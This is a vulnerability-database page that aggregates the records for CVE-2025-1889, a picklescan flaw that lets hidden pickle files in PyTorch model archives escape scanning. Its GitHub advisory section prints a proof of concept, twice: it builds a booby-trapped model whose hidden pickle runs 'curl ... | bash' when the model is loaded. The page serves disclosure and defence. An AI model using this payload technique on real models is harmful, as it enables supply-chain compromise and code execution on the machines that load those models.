cvelistv5 - CVE-2025-1889

CVE-2025-1889 (GCVE-0-2025-1889)

Vulnerability from cvelistv5 – Published: 2025-03-03 18:38 – Updated: 2025-03-04 11:43

Summary

picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.

Severity ?

5.3 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

CWE

CWE-646 - Reliance on File Name or Extension of Externally-Supplied File

Assigner

Sonatype

References

URL

Tags

	https://sites.google.com/sonatype.com/vulnerabili…	third-party-advisory
	https://github.com/mmaitre314/picklescan/security…	third-party-advisory

Impacted products

	Vendor	Product	Version
	mmaitre314	picklescan	Affected: 0.0.1 , ≤ 0.0.21 (semver)

Credits

Trevor Madge (@madgetr) of Sonatype

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-1889",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-03-03T20:06:20.369355Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-03T20:06:37.045Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://pypi.org/project/picklescan/",
          "defaultStatus": "unaffected",
          "packageName": "picklescan",
          "product": "picklescan",
          "repo": "https://github.com/mmaitre314/picklescan",
          "vendor": "mmaitre314",
          "versions": [
            {
              "lessThanOrEqual": "0.0.21",
              "status": "affected",
              "version": "0.0.1",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Trevor Madge (@madgetr) of Sonatype"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.\u003cbr\u003e"
            }
          ],
          "value": "picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "PASSIVE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-646",
              "description": "CWE-646 Reliance on File Name or Extension of Externally-Supplied File",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-03-04T11:43:39.089Z",
        "orgId": "103e4ec9-0a87-450b-af77-479448ddef11",
        "shortName": "Sonatype"
      },
      "references": [
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889"
        },
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "picklescan - Security scanning bypass via non-standard file extensions",
      "x_generator": {
        "engine": "Vulnogram 0.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "103e4ec9-0a87-450b-af77-479448ddef11",
    "assignerShortName": "Sonatype",
    "cveId": "CVE-2025-1889",
    "datePublished": "2025-03-03T18:38:10.046Z",
    "dateReserved": "2025-03-03T15:51:41.860Z",
    "dateUpdated": "2025-03-04T11:43:39.089Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-1889\",\"sourceIdentifier\":\"103e4ec9-0a87-450b-af77-479448ddef11\",\"published\":\"2025-03-03T19:15:34.560\",\"lastModified\":\"2025-03-05T20:49:16.457\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.\"},{\"lang\":\"es\",\"value\":\"picklescan antes de la versi\u00f3n 0.0.22 solo considera los extensiones est\u00e1ndar de archivos pickle en el \u00e1mbito de su revisi\u00f3n de vulnerabilidades. Un atacante podr\u00eda crear un modelo malicioso que utilice Pickle e incluir un archivo pickle malicioso con una extensi\u00f3n no est\u00e1ndar. Dado que la inclusi\u00f3n de un archivo pickle malicioso no se considera dentro del alcance de picklescan, el archivo pasar\u00eda las comprobaciones de seguridad y aparentar\u00eda ser seguro, cuando en realidad podr\u00eda resultar problem\u00e1tico.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"103e4ec9-0a87-450b-af77-479448ddef11\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"103e4ec9-0a87-450b-af77-479448ddef11\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-646\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:mmaitre314:picklescan:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.0.22\",\"matchCriteriaId\":\"A932F445-B2D1-431D-B3CD-937CFB9523BD\"}]}]}],\"references\":[{\"url\":\"https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v\",\"source\":\"103e4ec9-0a87-450b-af77-479448ddef11\",\"tags\":[\"Third Party Advisory\",\"Exploit\"]},{\"url\":\"https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889\",\"source\":\"103e4ec9-0a87-450b-af77-479448ddef11\",\"tags\":[\"Third Party Advisory\",\"Exploit\",\"Mitigation\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-1889\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-03-03T20:06:20.369355Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-03-03T20:06:25.812Z\"}}], \"cna\": {\"title\": \"picklescan - Security scanning bypass via non-standard file extensions\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Trevor Madge (@madgetr) of Sonatype\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 5.3, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"repo\": \"https://github.com/mmaitre314/picklescan\", \"vendor\": \"mmaitre314\", \"product\": \"picklescan\", \"versions\": [{\"status\": \"affected\", \"version\": \"0.0.1\", \"versionType\": \"semver\", \"lessThanOrEqual\": \"0.0.21\"}], \"packageName\": \"picklescan\", \"collectionURL\": \"https://pypi.org/project/picklescan/\", \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889\", \"tags\": [\"third-party-advisory\"]}, {\"url\": \"https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v\", \"tags\": [\"third-party-advisory\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.2.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-646\", \"description\": \"CWE-646 Reliance on File Name or Extension of Externally-Supplied File\"}]}], \"providerMetadata\": {\"orgId\": \"103e4ec9-0a87-450b-af77-479448ddef11\", \"shortName\": \"Sonatype\", \"dateUpdated\": \"2025-03-04T11:43:39.089Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-1889\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-03-04T11:43:39.089Z\", \"dateReserved\": \"2025-03-03T15:51:41.860Z\", \"assignerOrgId\": \"103e4ec9-0a87-450b-af77-479448ddef11\", \"datePublished\": \"2025-03-03T18:38:10.046Z\", \"assignerShortName\": \"Sonatype\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

PYSEC-2025-19

Vulnerability from pysec - Published: 2025-03-03 19:15 - Updated: 2025-04-09 17:27

Details

Severity ?

9.8 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Impacted products

Name	purl
picklescan	pkg:pypi/picklescan

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan",
        "purl": "pkg:pypi/picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.0.1",
        "0.0.10",
        "0.0.11",
        "0.0.12",
        "0.0.13",
        "0.0.14",
        "0.0.15",
        "0.0.16",
        "0.0.17",
        "0.0.18",
        "0.0.19",
        "0.0.2",
        "0.0.20",
        "0.0.21",
        "0.0.3",
        "0.0.4",
        "0.0.5",
        "0.0.6",
        "0.0.7",
        "0.0.8",
        "0.0.9"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-1889",
    "GHSA-655q-fx9r-782v"
  ],
  "details": "picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.",
  "id": "PYSEC-2025-19",
  "modified": "2025-04-09T17:27:26.916350+00:00",
  "published": "2025-03-03T19:15:34+00:00",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v"
    },
    {
      "type": "EVIDENCE",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v"
    },
    {
      "type": "EVIDENCE",
      "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889"
    },
    {
      "type": "WEB",
      "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

FKIE_CVE-2025-1889

Vulnerability from fkie_nvd - Published: 2025-03-03 19:15 - Updated: 2025-03-05 20:49

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	103e4ec9-0a87-450b-af77-479448ddef11	https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v	Third Party Advisory, Exploit
	103e4ec9-0a87-450b-af77-479448ddef11	https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889	Third Party Advisory, Exploit, Mitigation

Impacted products

	Vendor	Product	Version
	mmaitre314	picklescan	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:mmaitre314:picklescan:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A932F445-B2D1-431D-B3CD-937CFB9523BD",
              "versionEndExcluding": "0.0.22",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic."
    },
    {
      "lang": "es",
      "value": "picklescan antes de la versi\u00f3n 0.0.22 solo considera los extensiones est\u00e1ndar de archivos pickle en el \u00e1mbito de su revisi\u00f3n de vulnerabilidades. Un atacante podr\u00eda crear un modelo malicioso que utilice Pickle e incluir un archivo pickle malicioso con una extensi\u00f3n no est\u00e1ndar. Dado que la inclusi\u00f3n de un archivo pickle malicioso no se considera dentro del alcance de picklescan, el archivo pasar\u00eda las comprobaciones de seguridad y aparentar\u00eda ser seguro, cuando en realidad podr\u00eda resultar problem\u00e1tico."
    }
  ],
  "id": "CVE-2025-1889",
  "lastModified": "2025-03-05T20:49:16.457",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 5.3,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "LOW",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "103e4ec9-0a87-450b-af77-479448ddef11",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-03-03T19:15:34.560",
  "references": [
    {
      "source": "103e4ec9-0a87-450b-af77-479448ddef11",
      "tags": [
        "Third Party Advisory",
        "Exploit"
      ],
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-655q-fx9r-782v"
    },
    {
      "source": "103e4ec9-0a87-450b-af77-479448ddef11",
      "tags": [
        "Third Party Advisory",
        "Exploit",
        "Mitigation"
      ],
      "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889"
    }
  ],
  "sourceIdentifier": "103e4ec9-0a87-450b-af77-479448ddef11",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-646"
        }
      ],
      "source": "103e4ec9-0a87-450b-af77-479448ddef11",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-769V-P64C-89PR

Vulnerability from github – Published: 2025-03-03 19:59 – Updated: 2025-03-06 14:52

Summary

PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions

Details

CVE-2025-1889

Summary

Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.

Details

Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.

A typical attack works as follows:

A PyTorch model (model.pt) is created and saved normally.
A second pickle file (config.p) containing a malicious payload is crafted.
The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file='config.p'), causing config.p to be loaded when the model is opened.
Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.
The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.

PoC

import os
import pickle
import torch
import zipfile
from functools import partial

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, ("curl -s http://localhost:8080 | bash",)

# Create a directory inside the model
os.makedirs("model", exist_ok=True)

# Create a hidden malicious pickle file
with open("model/config.p", "wb") as f:
    pickle.dump(RemoteCodeExecution(), f)

# Create a benign model
model = {}
class AutoLoad:
    def __init__(self, path, **kwargs):
        self.path = path
        self.kwargs = kwargs

    def __reduce__(self):
        # Use functools.partial to create a partially applied function
        # with torch.load and the pickle_file argument
        return partial(torch.load, self.path, **self.kwargs), ()

model['config'] = AutoLoad(model_name, pickle_file='config.p', weights_only=False)
torch.save(model, "model.pt")

# Inject the second pickle into the model archive
with zipfile.ZipFile("model.pt", "a") as archive:
    archive.write("model/config.p", "model/config.p")

# Loading the model triggers execution of config.p
torch.load("model.pt")

Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.

Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.

Recommendations

Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.
Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.
Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\x80\x05).
Block the following globals: - torch.load - Block functools.partial

Severity ?

5.3 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.21"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-1889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-646"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-03T19:59:46Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### CVE-2025-1889\n\n### Summary\n\nPicklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch\u0027s torch.load() function. This can lead to arbitrary code execution when the model is loaded.\n\n### Details\n\nPicklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.\n\nA typical attack works as follows:\n\n- A PyTorch model (model.pt) is created and saved normally.\n- A second pickle file (config.p) containing a malicious payload is crafted.\n- The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file=\u0027config.p\u0027), causing config.p to be loaded when the model is opened.\n- Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.\n- The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.\n\n### PoC\n```\nimport os\nimport pickle\nimport torch\nimport zipfile\nfrom functools import partial\n\nclass RemoteCodeExecution:\n    def __reduce__(self):\n        return os.system, (\"curl -s http://localhost:8080 | bash\",)\n\n# Create a directory inside the model\nos.makedirs(\"model\", exist_ok=True)\n\n# Create a hidden malicious pickle file\nwith open(\"model/config.p\", \"wb\") as f:\n    pickle.dump(RemoteCodeExecution(), f)\n\n# Create a benign model\nmodel = {}\nclass AutoLoad:\n    def __init__(self, path, **kwargs):\n        self.path = path\n        self.kwargs = kwargs\n\n    def __reduce__(self):\n        # Use functools.partial to create a partially applied function\n        # with torch.load and the pickle_file argument\n        return partial(torch.load, self.path, **self.kwargs), ()\n\nmodel[\u0027config\u0027] = AutoLoad(model_name, pickle_file=\u0027config.p\u0027, weights_only=False)\ntorch.save(model, \"model.pt\")\n\n# Inject the second pickle into the model archive\nwith zipfile.ZipFile(\"model.pt\", \"a\") as archive:\n    archive.write(\"model/config.p\", \"model/config.p\")\n\n# Loading the model triggers execution of config.p\ntorch.load(\"model.pt\")\n```\n\n### Impact\n\nSeverity: High\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\n\nWhat is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.\n\nPotential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.\n\n### Recommendations\n\n1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.\n2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.\n3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\\x80\\x05).\n4. Block the following globals:\n        - torch.load\n        - Block functools.partial",
  "id": "GHSA-769v-p64c-89pr",
  "modified": "2025-03-06T14:52:09Z",
  "published": "2025-03-03T19:59:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-769v-p64c-89pr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1889"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/baf03faf88fece56a89534d12ce048e5ee36e50e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
